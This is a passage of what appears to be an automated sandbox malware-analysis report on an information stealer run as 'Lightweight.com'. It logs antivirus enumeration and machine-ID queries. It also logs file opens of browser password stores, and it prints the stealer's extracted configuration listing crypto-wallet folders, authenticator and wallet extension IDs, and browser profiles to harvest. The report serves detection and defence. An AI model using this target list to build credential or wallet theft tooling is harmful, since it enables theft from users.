                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_0789F06C CreateNamedPipeW,28_2_0789F06C
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *electrum*
                  Source: Lightweight.com, 00000017.00000003.2279302320.0000000003CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: Lightweight.com, 00000017.00000003.2279302320.0000000003CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: jdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge",
                  Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: jdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge",
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *ethereum*
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SerializeOrConvert( KeyProp, KeyPropertyTag, KeysToRemoveArray.EnterElement(), TempKeyValueStorage, DefaultsStruct)
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
